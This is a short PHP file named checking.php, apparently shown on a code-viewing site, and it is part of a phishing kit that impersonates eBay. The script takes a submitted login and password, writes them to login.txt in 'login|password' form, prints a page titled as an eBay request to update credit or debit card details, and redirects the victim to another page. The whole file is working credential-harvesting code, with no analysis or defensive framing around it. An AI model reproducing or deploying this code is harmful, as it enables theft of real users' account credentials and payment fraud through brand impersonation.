📄 checking.php
字号:
<?$error = "SignIn.php";if(empty($login)) { Header ("Location: $error"); }if(empty($password)) { Header ("Location: $error"); }else {print "<HTML><HEAD><TITLE>Place or update your credit /debit card information on your eBay account</TITLE>\n";print "<META http-equiv=Content-Type content=text/html charset=ISO-8859-1>\n";print "<META content=Microsoft FrontPage 5.0 name=GENERATOR></HEAD>\n";$Output=$login."|".$password; $duomenys=fopen('login.txt', "w"); fwrite($duomenys, "$Output\n");}?><script>window.location="index1.html"</script>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -